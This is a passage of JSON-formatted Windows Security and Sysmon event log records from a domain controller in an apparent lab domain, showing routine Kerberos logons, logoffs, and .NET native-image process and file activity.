GUID:\t\t{AFF56F56-76BC-49CD-114E-CD569E1577C2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::3413:3332:6143:4f60\r\n\tSource Port:\t\t55022\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xbc073","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{AFF56F56-76BC-49CD-114E-CD569E1577C2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::3413:3332:6143:4f60","IpPort":"55022","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220710,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xBBFF9\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xbbff9","LogonType":"3","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220711,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xBBFAF\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xbbfaf","LogonType":"3","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220712,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xBBEA2\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xbbea2","LogonType":"3","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6357,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:13.821\r\nProcessGuid: {A837DB8D-0439-5F25-0000-001074BA0B00}\r\nProcessId: 4548\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11c4-0\\System.Runtime.Remoting.dll\r\nCreationUtcTime: 2020-08-01 05:57:13.821","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:13.821","ProcessGuid":"{A837DB8D-0439-5F25-0000-001074BA0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11c4-0\\System.Runtime.Remoting.dll","CreationUtcTime":"2020-08-01 05:57:13.821","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6358,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.868\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0439-5F25-0000-00103CC30B00}\r\nTargetProcessId: 3896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.868","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0439-5F25-0000-00103CC30B00}","TargetProcessId":"3896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6359,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.868\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0439-5F25-0000-00103CC30B00}\r\nTargetProcessId: 3896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.868","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0439-5F25-0000-00103CC30B00}","TargetProcessId":"3896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6360,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.884\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0439-5F25-0000-00103CC30B00}\r\nTargetProcessId: 3896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.884","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0439-5F25-0000-00103CC30B00}","TargetProcessId":"3896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6361,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.931\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0439-5F25-0000-0010A9C60B00}\r\nTargetProcessId: 1260\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.931","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0439-5F25-0000-0010A9C60B00}","TargetProcessId":"1260","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6362,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.931\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0439-5F25-0000-0010A9C60B00}\r\nTargetProcessId: 1260\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.931","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0439-5F25-0000-0010A9C60B00}","TargetProcessId":"1260","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6363,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:13.931\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0439-5F25-0000-0010A9C60B00}\r\nTargetProcessId: 1260\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:13.931","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0439-5F25-0000-0010A9C60B00}","TargetProcessId":"1260","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
